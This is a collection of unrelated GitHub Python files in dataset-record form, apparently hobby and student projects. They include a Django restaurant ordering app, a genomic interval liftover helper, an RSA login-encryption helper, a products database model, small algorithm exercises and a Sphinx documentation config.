auth.logout(request)\n return HttpResponseRedirect('login')\n\n@login_required(redirect_field_name='login')\ndef block_menu(request):\n category = Category.objects.exclude(category_name = 'Drinks')\n category = category.exclude(category_name = 'Snacks')\n drinks = Category.objects.filter(category_name = 'Drinks')\n snacks = Category.objects.filter(category_name = 'Snacks')\n cart = Cart.objects.filter(table_id = auth.get_user(request))\n total = 0\n for cart in cart:\n cart_food = cart.carted_food.all()\n for food in cart_food:\n total += food.price\n args = {'Category': category, 'Drinks': drinks, 'Snacks': snacks, 'Total': total}\n return render(\n request,\n 'restaurant/block_menu.html',\n\t\targs,\n )\n\n@login_required(redirect_field_name='login')\ndef menu(request):\n return render(\n request,\n 'restaurant/menu.html',\n {\n 'title':'Menu',\n }\n )\n\n@login_required(redirect_field_name='login')\ndef block_orders(request):\n bill = Order.objects.get(table_id = auth.get_user(request), billed = False)\n foodlist = []\n total = 0\n state = Order_State.objects.filter(order = bill)\n for state in state:\n foodlist.append(state)\n if state.state != 'cancelled':\n total += state.food.price\n context = {'foodlist' : foodlist, 'total': total}\n return render(\n request,\n 'restaurant/block_orders.html',\n context,\n )\n\n@login_required(redirect_field_name='login')\ndef orders(request):\n return render(\n request,\n 'restaurant/orders.html',\n {\n 'title':'Orders',\n }\n )\n\n@login_required(redirect_field_name='login')\ndef block_services(request):\n total = 0\n try:\n bill = Order.objects.get(table_id = auth.get_user(request), billed = False)\n hasOrder = True\n state = Order_State.objects.filter(order = bill)\n for state in state:\n if state.state != 'cancelled':\n total += state.food.price\n except Order.DoesNotExist:\n hasOrder = False\n args = {'hasOrder': hasOrder, 'total': total}\n return render(\n\t\trequest,\n\t\t'restaurant/block_services.html',\n\t\targs,\n )\n\n@login_required(redirect_field_name='login')\ndef services(request):\n return render(\n\t\trequest,\n\t\t'restaurant/services.html',\n )\n\n@login_required(redirect_field_name='login')\ndef block_cart(request):\n category_id = request.POST.get('category_id')\n cart = Cart.objects.filter(table_id = auth.get_user(request))\n foodlist = []\n for cart in cart:\n cart_food = cart.carted_food.all()\n for food in cart_food:\n foodlist.append(food)\n context = {'cart': foodlist, 'category_id': category_id}\n template = 'restaurant/block_cart.html'\n return render(request, template, context)\n\n@login_required(redirect_field_name='login')\ndef cart(request):\n return render(\n request,\n 'restaurant/cart.html',\n )\n\n@login_required(redirect_field_name='login')\ndef block_items(request):\n category_id = request.POST.get('category_id')\n foods = Food.objects.filter(category_id = category_id, available = True)\n title = Category.objects.filter(category_id = category_id)\n cart = Cart.objects.filter(table_id = auth.get_user(request))\n total = 0\n for cart in cart:\n cart_food = cart.carted_food.all()\n for food in cart_food:\n total += food.price\n args = {'Food': foods, 'Title': title, 'category_id': category_id, 'Total': total}\n return render(\n\t\trequest,\n\t\t'restaurant/block_items.html',\n\t\targs,\n )\n\n@login_required(redirect_field_name='login')\ndef items(request):\n\treturn render(\n request,\n 'restaurant/items.html',\n )\n\n@login_required(redirect_field_name='login')\ndef add_to_cart(request):\n food_id = request.POST.get('food_id')\n quantity = int(request.POST.get('quantity'))\n food = Food.objects.get(food_id=food_id)\n try:\n cart = Cart.objects.get(table_id=auth.get_user(request))\n cart_s = Cart_State.objects.filter(cart = cart)\n if cart_s.count() + quantity > 30:\n return HttpResponse('Failure')\n except Cart.DoesNotExist:\n cart = Cart.objects.create(table_id=auth.get_user(request))\n for x in range(quantity):\n cart_state = Cart_State.objects.create(cart=cart, food=food)\n\n return HttpResponse('success')\n\n@login_required(redirect_field_name='login')\ndef remove_from_cart(request):\n food_id = request.POST.get('food_id')\n if food_id == 'ALL':\n try:\n cart = Cart.objects.get(table_id=auth.get_user(request))\n cart.delete()\n except Cart.DoesNotExist:\n pass\n else:\n food = Food.objects.get(food_id=food_id)\n cart = Cart.objects.get(table_id=auth.get_user(request))\n cart_state = Cart_State.objects.filter(cart=cart, food=food).first()\n cart_state.delete()\n\n return HttpResponse('')\n\n@login_required(redirect_field_name='login')\ndef proceed_order(request):\n table_id = auth.get_user(request)\n cart = Cart.objects.filter(table_id = table_id)\n proceed_order = 'cart_empty'\n print('==============================================')\n print(\"Table\", table_id, \"ordered\")\n for cart in cart:\n proceed_order = 'proceed_order'\n cart_food = cart.carted_food.all()\n for food in cart_food:\n try:\n order = Order.objects.get(table_id = auth.get_user(request), billed = False)\n except Order.DoesNotExist:\n order = Order.objects.create(table_id=auth.get_user(request))\n order_state = Order_State.objects.create(order=order, food=food, state='ordered')\n print(food.food_name)\n print('==============================================')\n cart.delete()\n hasOrder = False\n total = 0\n try:\n bill = Order.objects.get(table_id = auth.get_user(request), billed = False)\n hasOrder = True\n state = Order_State.objects.filter(order = bill)\n for state in state:\n if state.state != 'cancelled':\n total += state.food.price\n except Order.DoesNotExist:\n hasOrder = False\n args = {'hasOrder': hasOrder, 'total': total, 'proceed_order': proceed_order}\n return render(\n request,\n 'restaurant/block_home.html',\n args,\n )\n\n@login_required(redirect_field_name='login')\ndef return_order(request):\n index = int(request.POST.get('index'))\n bill = Order.objects.get(table_id = auth.get_user(request), billed = False)\n orderedFood = Order_State.objects.filter(order = bill)\n counter = 0;\n for food in orderedFood:\n if counter == index:\n if food.state == 'ordered' or food.state == 'making':\n food.state = 'cancelled'\n food.save()\n print('====================================')\n print(\"Table\", auth.get_user(request), \"cancelled\")\n print(food.food.food_name)\n print('====================================')\n break\n else:\n counter = counter + 1\n return HttpResponse('')\n\n@login_required(redirect_field_name='login')\ndef get_order_state(request):\n bill = Order.objects.filter(table_id = auth.get_user(request), billed = False)\n lists = Order_State.objects.filter(order = bill[0]).only('state')\n result = []\n for state in lists:\n result.append(state.state)\n return JsonResponse(result, safe=False)\n\n@login_required(redirect_field_name='login')\ndef service_add_water(request):\n print(\"Table\", auth.get_user(request), \"requested for adding water\")\n return HttpResponse('')\n\n@login_required(redirect_field_name='login')\ndef service_clean_table(request):\n print(\"Table\", auth.get_user(request), \"requested for table cleaning\")\n return HttpResponse('')\n\n@login_required(redirect_field_name='login')\ndef service_baby_chair(request):\n print(\"Table\", auth.get_user(request), \"requested for baby chair\")\n return HttpResponse('')\n\n@login_required(redirect_field_name='login')\ndef bill_page(request):\n table_id = auth.get_user(request)\n bill = Order.objects.get(table_id = auth.get_user(request), billed = False)\n state = Order_State.objects.filter(order = bill)\n id = bill.order_id\n time = bill.timestamp\n result = []\n total = 0;\n for state in state:\n if state.state != \"cancelled\":\n result.append(state)\n total += state.food.price\n args = {'result': result, 'id': id, 'total': total}\n return render(\n request,\n 'restaurant/bill.html',\n args,\n )\n\n@login_required(redirect_field_name='login')\ndef force_logout(request):\n try:\n bill = Order.objects.get(table_id = auth.get_user(request), billed = False)\n hasOrder = 'true'\n except Order.DoesNotExist:\n hasOrder = 'false'\n return HttpResponse(hasOrder)\n\ndef thankyou(request):\n return render(\n request,\n 'restaurant/thankyou.html',\n )\n","repo_name":"tsehowang/FYP2","sub_path":"restaurantFYP/restaurant/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":12200,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"34948050487","text":"# eam\n# 2021-03-12\n\nfrom gnomad.utils.liftover import *\n\nimport logging\nimport hail as hl\n\nfrom utils.generic import current_date\n\nlogging.basicConfig(\n format=\"%(asctime)s (%(name)s %(lineno)s): %(message)s\",\n datefmt=\"%m/%d/%Y %I:%M:%S %p\",\n)\nlogger = logging.getLogger(__name__)\nlogger.setLevel(logging.INFO)\n\n\nnfs_dir = 'file:///home/ubuntu/data'\n\n\ndef liftover_intervals(t: hl.Table,\n keep_missing_interval: bool = False) -> hl.Table:\n \"\"\"\n Liftover locus in intervals from one coordinate system (hg37) to another (hg38)\n\n # Example input table description\n #\n # ----------------------------------------\n # Global fields:\n # None\n # ----------------------------------------\n # Row fields:\n # 'interval': interval>\n # ----------------------------------------\n # Key: ['interval']\n # ----------------------------------------\n\n\n :param t: Table of intervals on GRCh37\n :param keep_missing_interval: If True, keep missing (non-lifted) intervals in the output Table.\n :return: Table with intervals lifted over GRCh38 added.\n \"\"\"\n\n rg37 = hl.get_reference(\"GRCh37\")\n rg38 = hl.get_reference(\"GRCh38\")\n\n if not rg37.has_liftover(\"GRCh38\"):\n rg37.add_liftover(\n f'{nfs_dir}/resources/liftover/grch37_to_grch38.over.chain.gz', rg38\n )\n\n t = t.annotate(\n start=hl.liftover(t.interval.start, \"GRCh38\"),\n end=hl.liftover(t.interval.end, \"GRCh38\"),\n )\n\n t = t.filter(\n (t.start.contig == \"chr\" + t.interval.start.contig)\n & (t.end.contig == \"chr\" + t.interval.end.contig)\n )\n\n t = t.key_by()\n\n t = (t\n .select(interval=hl.locus_interval(t.start.contig,\n t.start.position,\n t.end.position,\n reference_genome=rg38,\n invalid_missing=True),\n interval_hg37=t.interval\n )\n )\n\n # bad intervals\n missing = t.aggregate(hl.agg.counter(~hl.is_defined(t.interval)))\n logger.info(\n f\"Number of missing intervals: {missing[True]} out of {t.count()}...\"\n )\n\n # update globals annotations\n global_ann_expr = {'date': current_date(),\n 'reference_genome': 'GRCh38',\n 'was_lifted': True\n }\n t = t.annotate_globals(**global_ann_expr)\n\n if not keep_missing_interval:\n logger.info(\n f\"Filtering out {missing[True]} missing intervals...\"\n )\n t = t.filter(hl.is_defined(t.interval), keep=True)\n\n return t.key_by(\"interval\")\n\n","repo_name":"enriquea/wes_chd_ukbb","sub_path":"utils/liftover.py","file_name":"liftover.py","file_ext":"py","file_size_in_byte":2726,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"1504827328","text":"#!/usr/bin/env python\n# _*_ coding:utf-8 _*_\n\n# @Author: Merack\n# @Email: merack@qq.com\n\nimport rsa\n\n\n# 用Python实现的no Padding 方式的RSA加密(因为校园网的js中的RSA加密用就是no Padding模式,而Python中的RSA库没有这个模式,真坑 -_-)\n# 来源: https://www.cnblogs.com/pythonClub/p/10464745.html\nclass Encrypt(object):\n def __init__(self, e, m):\n self.e = e\n self.m = m\n\n def encrypt(self, message):\n mm = int(self.m, 16)\n ee = int(self.e, 16)\n rsa_pubkey = rsa.PublicKey(mm, ee)\n crypto = self._encrypt(message.encode(), rsa_pubkey)\n return crypto.hex()\n\n def _pad_for_encryption(self, message, target_length):\n message = message[::-1]\n max_msglength = target_length - 11\n msglength = len(message)\n\n padding = b''\n padding_length = target_length - msglength - 3\n\n for i in range(padding_length):\n padding += b'\\x00'\n\n return b''.join([b'\\x00\\x00', padding, b'\\x00', message])\n\n def _encrypt(self, message, pub_key):\n keylength = rsa.common.byte_size(pub_key.n)\n padded = self._pad_for_encryption(message, keylength)\n\n payload = rsa.transform.bytes2int(padded)\n encrypted = rsa.core.encrypt_int(payload, pub_key.e, pub_key.n)\n block = rsa.transform.int2bytes(encrypted, keylength)\n\n return block\n","repo_name":"Merack/fosuNet","sub_path":"Encrypt.py","file_name":"Encrypt.py","file_ext":"py","file_size_in_byte":1389,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"2360163783","text":"\"\"\"Thit is test program\"\"\"\n\nfrom typing import List\nfrom _path import SYSTEM_AREA\nfrom logging import Logger\n\nfrom logger_gen import set_logger\nfrom src.shape.shaper import Shaper\n\nimport os\n\nif __name__ == \"__main__\":\n print(f\"test_shaper: connect to {SYSTEM_AREA}\")\n\n\ndef process(logger: Logger, paths):\n\n shaping = Shaper(\n logger=logger,\n batch_size=3,\n visualize_graph=False,\n visualize_noise=False,\n visualize_interpolation=False,\n visualize_all=False,\n single_proc=False,\n redo=True,\n )\n\n paths = path_creater(paths)\n\n # run test code\n shaping(paths)\n\n\ndef path_creater(paths):\n new_paths = []\n for path in paths:\n ret, same_list = get_same_files(path[0])\n\n if not ret:\n continue\n\n for same_file in same_list:\n\n f_name = os.path.basename(same_file)\n out_dir = os.path.dirname(path[2])\n out_file = \".\".join([f_name.split(\".\")[0], \"sh\"])\n out_path = os.path.join(out_dir, out_file)\n\n new_paths.append(\n (\n same_file,\n path[1],\n out_path,\n )\n )\n return new_paths\n\n\ndef get_same_files(path) -> List[str]:\n \"\"\"Check if the results of trim-area and face-mesh exist.\"\"\"\n dir_path = os.path.dirname(path)\n target_file = os.path.basename(path)\n\n target_name, target_ext = target_file.split(\".\")\n target_name = target_name.split(\"_\")\n\n same_list = []\n\n file_list = os.listdir(dir_path)\n exist_flg = False\n for file in file_list:\n if not os.path.isfile(os.path.join(dir_path, file)):\n continue\n\n f_name, f_ext = file.split(\".\")\n f_name = f_name.split(\"_\")\n\n if f_ext != target_ext:\n continue\n\n flg = False\n for idx, t_n in enumerate(target_name):\n if t_n != f_name[idx]:\n flg = True\n break\n if not flg:\n exist_flg = True\n same_list.append(os.path.join(dir_path, file))\n\n return exist_flg, same_list\n\n\nif __name__ == \"__main__\":\n log = set_logger(\"TEST-SHAPE\", \"log/test/test-shp.log\")\n path_list = [\n (\n \"test/face_mesh/out/webcame.hp\",\n \"./data/test/webcame.mp4\",\n \"test/shape/out/webcame.sh\",\n ),\n (\n \"test/face_mesh/out/webcame2.hp\",\n \"./data/test/webcame2.mp4\",\n \"test/shape/out/webcame2.sh\",\n ),\n (\n \"test/face_mesh/out/webcame3.hp\",\n \"./data/test/webcame3.mp4\",\n \"test/shape/out/webcame3.sh\",\n ),\n (\n \"test/face_mesh/out/webcame4.hp\",\n \"./data/test/webcame4.mp4\",\n \"test/shape/out/webcame4.sh\",\n ),\n (\n \"test/face_mesh/out/webcame5.hp\",\n \"./data/test/webcame5.mp4\",\n \"test/shape/out/webcame5.sh\",\n ),\n (\n \"test/face_mesh/out/webcame6.hp\",\n \"./data/test/webcame6.mp4\",\n \"test/shape/out/webcame6.sh\",\n ),\n # (\n # \"test/face_mesh/out/webcame7.hp\",\n # \"./data/test/webcame7.mp4\",\n # \"test/shape/out/webcame7.sh\",\n # ),\n # (\n # \"test/face_mesh/out/webcame8.hp\",\n # \"./data/test/webcame8.mp4\",\n # \"test/shape/out/webcame8.sh\",\n # ),\n # (\n # \"test/face_mesh/out/webcame9.hp\",\n # \"./data/test/webcame9.mp4\",\n # \"test/shape/out/webcame9.sh\",\n # ),\n # (\n # \"test/face_mesh/out/short1.hp\",\n # \"./data/test/short1.mp4\",\n # \"test/shape/out/short1.sh\",\n # ),\n # (\n # \"test/face_mesh/out/short2.hp\",\n # \"./data/test/short2.mp4\",\n # \"test/shape/out/short2.sh\",\n # ),\n # (\n # \"test/face_mesh/out/midol1s.hp\",\n # \"./data/test/midol1s.mp4\",\n # \"test/shape/out/midol1s.sh\",\n # ),\n # (\n # \"test/face_mesh/out/test1.hp\",\n # \"./data/test/test1.mp4\",\n # \"test/shape/out/test1.sh\",\n # ),\n # (\n # \"test/face_mesh/out/test2.hp\",\n # \"./data/test/test2.mp4\",\n # \"test/shape/out/test2.sh\",\n # ),\n # (\n # \"test/face_mesh/out/test3.hp\",\n # \"./data/test/test3.mp4\",\n # \"test/shape/out/test3.sh\",\n # ),\n # (\n # \"test/face_mesh/out/test4.hp\",\n # \"./data/test/test4.mp4\",\n # \"test/shape/out/test4.sh\",\n # ),\n # (\n # \"test/face_mesh/out/test5.hp\",\n # \"./data/test/test5.mp4\",\n # \"test/shape/out/test5.sh\",\n # ),\n # (\n # \"test/face_mesh/out/test6.hp\",\n # \"./data/test/test6.mp4\",\n # \"test/shape/out/test6.sh\",\n # ),\n # (\n # \"test/face_mesh/out/test7.hp\",\n # \"./data/test/test7.mp4\",\n # \"test/shape/out/test7.sh\",\n # ),\n # (\n # \"test/face_mesh/out/test8.hp\",\n # \"./data/test/test8.mp4\",\n # \"test/shape/out/test8.sh\",\n # ),\n # (\n # \"test/face_mesh/out/test9.hp\",\n # \"./data/test/test9.mp4\",\n # \"test/shape/out/test9.sh\",\n # ),\n # (\n # \"test/face_mesh/out/test10.hp\",\n # \"./data/test/test10.mp4\",\n # \"test/shape/out/test10.sh\",\n # ),\n # (\n # \"test/face_mesh/out/test11.hp\",\n # \"./data/test/test11.mp4\",\n # \"test/shape/out/test11.sh\",\n # ),\n # (\n # \"test/face_mesh/out/test12.hp\",\n # \"./data/test/test12.mp4\",\n # \"test/shape/out/test12.sh\",\n # ),\n # (\n # \"test/face_mesh/out/test13.hp\",\n # \"./data/test/test13.mp4\",\n # \"test/shape/out/test13.sh\",\n # ),\n # (\n # \"test/face_mesh/out/test14.hp\",\n # \"./data/test/test14.mp4\",\n # \"test/shape/out/test14.sh\",\n # ),\n ]\n process(log, path_list)\n","repo_name":"MTamon/FaceMotionDetection","sub_path":"test/shape/test_shaper.py","file_name":"test_shaper.py","file_ext":"py","file_size_in_byte":6213,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"9230808612","text":"from ..database import DatabaseConnection\nclass products:\n def __init__(self, product_id,product_name,brand,category,model_year,list_price):\n self.product_id = product_id\n self.product_name = product_name\n self.brand = brand\n self.category = category\n self.model_year = model_year\n self.list_price = list_price\n def __str__(self):\n return f\"{self.product_name},{self.brand},{self.category},{self.model_year}\"\n @classmethod\n def get_product_by_id(cls, producto_id):\n query = '''\n SELECT\n p.product_id,\n p.product_name,\n b.brand_id,\n b.brand_name,\n c.category_id,\n c.category_name,\n p.model_year,\n p.list_price\n FROM\n products p\n JOIN brands b ON p.brand_id = b.brand_id\n JOIN categories c ON p.category_id = c.category_id\n WHERE\n p.product_id = %s\n '''\n params = (producto_id,)\n result = DatabaseConnection.fetch_one(query, params)\n if result is not None:\n return products(\n product_id=result[0],\n product_name=result[1],\n brand={\"brand_id\": result[2], \"brand_name\": result[3]},\n category={\"category_id\": result[4], \"category_name\": result[5]},\n model_year=result[6],\n list_price=result[7]\n )\n else:\n return None\n\n @classmethod\n def create_product(cls, product):\n query = '''\n INSERT INTO products (product_name, brand_id, category_id, model_year, list_price)\n VALUES (%s, %s, %s, %s, %s)\n '''\n values = (product.product_name, product.brand, product.category, product.model_year, product.list_price)\n\n connection = DatabaseConnection.get_connection()\n cursor = connection.cursor()\n cursor.execute(query, values)\n connection.commit()\n cursor.close()\n return True\n\n @classmethod\n def get_all_products(cls):\n query = '''\n SELECT\n p.product_id,\n p.product_name,\n b.brand_id,\n b.brand_name,\n c.category_id,\n c.category_name,\n p.model_year,\n p.list_price\n FROM\n products p\n JOIN brands b ON p.brand_id = b.brand_id\n JOIN categories c ON p.category_id = c.category_id\n '''\n results = DatabaseConnection.fetch_all(query)\n products_list = []\n\n for result in results:\n products_list.append({\n \"product_id\": result[0],\n \"product_name\": result[1],\n \"brand\": {\"brand_id\": result[2], \"brand_name\": result[3]},\n \"category\": {\"category_id\": result[4], \"category_name\": result[5]},\n \"model_year\": result[6],\n \"list_price\": result[7]\n })\n\n return products_list\n \n \n @classmethod\n def guardar_cambios_en_db(cls, product):\n query = '''\n UPDATE products\n SET product_name = %s, brand_id = %s, category_id = %s, model_year = %s, list_price = %s\n WHERE product_id = %s\n '''\n values = (\n product.product_name,\n product.brand.get('brand_id'), \n product.category.get('category_id'), \n product.model_year,\n product.list_price,\n product.product_id\n )\n connection = DatabaseConnection.get_connection()\n cursor = connection.cursor()\n cursor.execute(query, values)\n connection.commit() \n cursor.close()\n return True\n \n","repo_name":"Loboxos/tp3.2-Upateco-python-flask-mysql","sub_path":"tp3.2/app/models/products.py","file_name":"products.py","file_ext":"py","file_size_in_byte":3938,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"35437982873","text":"class Node(object):\r\n def __init__(self, data=None, nextNode=None):\r\n self.data = data\r\n self.nextNode = nextNode\r\n\r\n def getData(self):\r\n return self.data\r\n\r\n def getNext(self):\r\n return self.nextNode\r\n\r\n def setNext(self, newNext):\r\n self.nextNode = newNext\r\n\r\nclass linkedList(object):\r\n def __init__ (self, head=None):\r\n self.head = head\r\n \r\n def insert(self, newNode):\r\n newNode.setNext(self.head)\r\n self.head=newNode\r\n \r\n def size(self):\r\n current=self.head\r\n count = 0\r\n while current:\r\n count+=1\r\n current=current.getNext()\r\n return count\r\n \r\n def search(self, data):\r\n current=self.head\r\n found = False\r\n while current and found is False:\r\n if current.getData() == data:\r\n found = True\r\n else:\r\n current = current.getNext()\r\n if current is None:\r\n raise ValueError (\"Nothing here\")\r\n return current\r\n\r\n def delete(self,data):\r\n current=self.head\r\n previous=None\r\n found=False\r\n while current and found is False:\r\n if current.getData()==data:\r\n found = True\r\n else:\r\n previous = current\r\n current=current.getNext\r\n if current is None:\r\n raise ValueError(\"nothing here!\")\r\n if previous is None:\r\n self.head = current.getNext()\r\n else:\r\n previous.setNext(current.getNext())\r\n\r\n def read(self):\r\n current=self.head\r\n while current is not None:\r\n print (current.getData())\r\n current=current.getNext()\r\n\r\nnewNode=Node(\"hello\")\r\nnewNode2=Node(\"how are you\")\r\nlList = linkedList(Node(\"n-scheme\"))\r\nlList.insert(newNode)\r\nlList.insert(Node(\"cacatuas multiples\"))\r\nlList.read()\r\nprint(lList.head.getData())\r\n","repo_name":"felix-hh/Sample-Code","sub_path":"Sample code/Data structures/LinkedList1.py","file_name":"LinkedList1.py","file_ext":"py","file_size_in_byte":1943,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"42382026887","text":"from tkinter import *\nfrom PIL import Image, ImageTk, ImageDraw\n\nreference = []\nfor i in range(10):\n reference.append([])\n for j in range(25):\n reference[i].append(0)\n\n\ndef get_reference():\n global reference_pil_img, reference\n all_pix = reference_pil_img.load()\n\n for n in range(10):\n\n for x in range(5):\n #print(100 * n + 20 * x)\n for y in range(5):\n\n for i in range(20):\n for j in range(27):\n if(all_pix[100 * n + 20 * x + i, 27 * y + j][0] <= 127):\n reference[n][5 * x + y] += 1\n\n #for k in reference:\n # print(k)\n\n\n\ndef find_digit():\n global original_pil_img, reference\n all_pix = original_pil_img.load()\n digit = []\n for i in range(25):\n digit.append(0)\n\n for x in range(5):\n for y in range(5):\n\n for i in range(20):\n for j in range(27):\n if (all_pix[20 * x + i, 27 * y + j][0] <= 127):\n digit[5 * x + y] += 1\n\n min_delta = 1000000\n min_n = -1\n\n for n in range(10):\n sum = 0\n for k in range(25):\n sum += abs(reference[n][k] - digit[k])\n if(sum <= min_delta):\n min_delta = sum\n min_n = n\n\n print(min_n)\n\n #print(digit)\n\n\noriginal_pil_img = Image.open('img5.jpg')\nreference_pil_img = Image.open('reference.jpg')\nget_reference()\nfind_digit()","repo_name":"GooS69/image_processing","sub_path":"main5.py","file_name":"main5.py","file_ext":"py","file_size_in_byte":1454,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"26614820473","text":"from collections import deque\n\nn = int(input())\nS = input()\nT = input()\n\nif sorted(S) != sorted(T):\n print(\"No\")\n exit()\n\n\ndef check(k):\n right = deque(S[k:])\n for t in T:\n if right[0] == t:\n right.popleft()\n if len(right) == 0:\n return True\n return False\n\n\nng = -1\nok = n\n\nwhile ok - ng > 1:\n mid = (ok + ng) // 2\n\n if check(mid):\n ok = mid\n else:\n ng = mid\nprint(ok)\n","repo_name":"mei28/Competitive-programing","sub_path":"ARC-154/B.py","file_name":"B.py","file_ext":"py","file_size_in_byte":443,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22245084938","text":"# -*- coding: utf-8 -*-\n\nfrom __future__ import absolute_import\n\n# Standard Library\nimport sqlite3\n\n# External Libraries\nfrom path import path\n\n\ndef dict_factory(cursor, row):\n d = {}\n for idx, col in enumerate(cursor.description):\n d[col[0]] = row[idx]\n return d\n\n\ndef get_db(name=':memory:', databases={}, row_factory=dict_factory):\n\n if isinstance(name, sqlite3.Connection):\n return name\n\n if name != ':memory:':\n name = path(name).abspath()\n\n if not name.dirname().exists():\n raise Exception('Can\\'t create db as path doesn\\'t exit')\n\n conn = databases.get(name) or sqlite3.connect(name)\n conn.row_factory = row_factory\n databases[name] = conn\n return conn\n","repo_name":"NorthIsUp/dorm","sub_path":"dorm/db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":727,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"6025705796","text":"def input_int(msg, error_msg: str) -> int:\n while True:\n try:\n temp = int(input(str(msg)))\n except:\n print(error_msg)\n else:\n return temp\n\ndef input_int_range(msg, start: int, end: int, type_error_msg: str, range_error_msg: str) -> int:\n while True:\n temp = input_int(msg, type_error_msg)\n if temp >= start and temp <= end:\n return temp\n else:\n print(range_error_msg)\n\ndef main():\n item_count = input_int(\"Enter the amount of items to process: \", \"ERROR: Enter a correct value\")\n items = []\n\n for _ in range(item_count):\n name = input(\"Enter the product's name: \")\n id = input(\"Enter the product's identifier: \")\n amount = input_int(\"Enter item's purchased amount: \", \"ERROR: Enter a correct value\")\n unit_price = input_int(\"Enter item's unit price: \", \"ERROR: Enter a correct value\")\n iva_type = input_int_range(\"Enter IVA type:\\n 1. Tax free\\n 2. Goods\\n 3. General\\n> \", 1, 3, \"ERROR: Enter a correct option\", \"ERROR: Enter a corrent value\")\n iva_percentage = {1: 0.0, 2: 0.05, 3: 0.19}.get(iva_type, 0)\n subtotal = (unit_price * amount)\n\n items.append({\"name\": name, \"id\": id, \"amount\": amount, \"unit_price\": unit_price, \"iva_type\": iva_type, \"iva_percentage\": iva_percentage, \"subtotal\": subtotal})\n \n print(\"\\n\".join([(\n f'- {item[\"name\"]} | [{item[\"id\"]}]\\n'.upper() +\n f' Amount: {item[\"amount\"]}\\n' +\n f' Unit Price: ${item[\"unit_price\"]:,}\\n'.replace(\",\", \".\") +\n f' IVA: {({1: \"Tax Free 0%\", 2: \"Goods 5%\", 3: \"General 19%\"}.get(item[\"iva_type\"]))}\\n' +\n f' Subtotal price: ${item[\"subtotal\"]:,}\\n'.replace(\",\", \".\") +\n f' Total price: ${round(item[\"subtotal\"] * (1 + item[\"iva_percentage\"])):,}\\n'.replace(\",\", \".\")\n )for item in items]))\n\nif __name__ == \"__main__\":\n main()","repo_name":"AxonDesigns/SENA_ADSO","sub_path":"python/VentaItems.py","file_name":"VentaItems.py","file_ext":"py","file_size_in_byte":1950,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"3886268185","text":"# Configuration file for the Sphinx documentation builder.\n#\n# This file only contains a selection of the most common options. For a full\n# list see the documentation:\n# https://www.sphinx-doc.org/en/master/usage/configuration.html\n\n# -- Path setup --------------------------------------------------------------\n\n# If extensions (or modules to document with autodoc) are in another directory,\n# add these directories to sys.path here. If the directory is relative to the\n# documentation root, use os.path.abspath to make it absolute, like shown here.\n\nimport os\nfrom pathlib import Path\n\nVERSION_MODULE_PATH = os.path.join(Path(os.path.dirname(__file__)).parents[0], \"graphtage\", \"version.py\")\n\n\ndef get_version_string():\n attrs = {}\n with open(VERSION_MODULE_PATH) as f:\n exec(f.read(), attrs)\n vstring = attrs['VERSION_STRING']\n if 'git' in vstring:\n return vstring\n else:\n return f\"v{vstring}\"\n\n\n# -- Project information -----------------------------------------------------\n\nproject = 'Graphtage'\ncopyright = '2020, Trail of Bits'\nauthor = 'Evan Sultanik'\n\n# The full version, including alpha/beta/rc tags\nrelease = get_version_string()\nversion = release\ngithub_url = 'https://github.com/trailofbits/graphtage/'\nif 'git' not in version:\n github_url = f\"{github_url}releases/tag/{ version }\"\n\n\n# -- General configuration ---------------------------------------------------\n\n# Add any Sphinx extension module names here, as strings. They can be\n# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom\n# ones.\nextensions = [\n 'sphinx.ext.autodoc',\n 'sphinx.ext.napoleon',\n 'sphinx.ext.intersphinx',\n 'sphinx.ext.todo',\n 'sphinx.ext.autosectionlabel',\n 'sphinx_rtd_theme',\n #'sphinxcontrib.fulltoc'\n]\n\n# Add any paths that contain templates here, relative to this directory.\ntemplates_path = ['_templates']\n\n# List of patterns, relative to source directory, that match files and\n# directories to ignore when looking for source files.\n# This pattern also affects html_static_path and html_extra_path.\nexclude_patterns = ['_build', 'Thumbs.db', '.DS_Store']\n\n\n# -- Options for HTML output -------------------------------------------------\n\n# The theme to use for HTML and HTML Help pages. See the documentation for\n# a list of builtin themes.\n#\n#html_theme = 'classic'\nhtml_theme = 'sphinx_rtd_theme'\n\nhtml_theme_options = {\n 'canonical_url': f'https://trailofbits.github.io/graphtage/latest/',\n 'logo_only': False,\n 'display_version': False, # This manually configured in our custom templates\n 'prev_next_buttons_location': 'bottom',\n 'style_external_links': True,\n #'vcs_pageview_mode': '',\n #'style_nav_header_background': 'white',\n # Toc options\n 'collapse_navigation': True,\n 'sticky_navigation': True,\n 'navigation_depth': 4,\n 'includehidden': True,\n 'titles_only': False\n}\n\nhtml_context = {\n 'github_url': github_url\n}\n\n# Add any paths that contain custom static files (such as style sheets) here,\n# relative to this directory. They are copied after the builtin static files,\n# so a file named \"default.css\" will overwrite the builtin \"default.css\".\nhtml_static_path = ['_static']\n\n#html_js_files = [\n# 'localtoc.js',\n#]\n\n\ndef skip(app, what, name, obj, would_skip, options):\n if name == \"__init__\":\n return False\n return would_skip\n\n\ndef docstring_callback(app, what, name, obj, options, lines: list):\n if what == 'class' or what == 'function':\n if lines and lines[0].strip():\n lines.insert(1, '')\n lines.insert(2, name)\n lines.insert(3, '*' * len(name))\n if len(lines) == 4:\n lines.append('')\n\n\ndef setup(app):\n app.connect(\"autodoc-skip-member\", skip)\n #app.connect('autodoc-process-docstring', docstring_callback)\n\n\nadd_package_names = False\n# prefix each section label with the name of the document it is in, followed by a colon\nautosectionlabel_prefix_document = True\nintersphinx_mapping = {'python': ('https://docs.python.org/3', None)}\nnapoleon_include_private_with_doc = 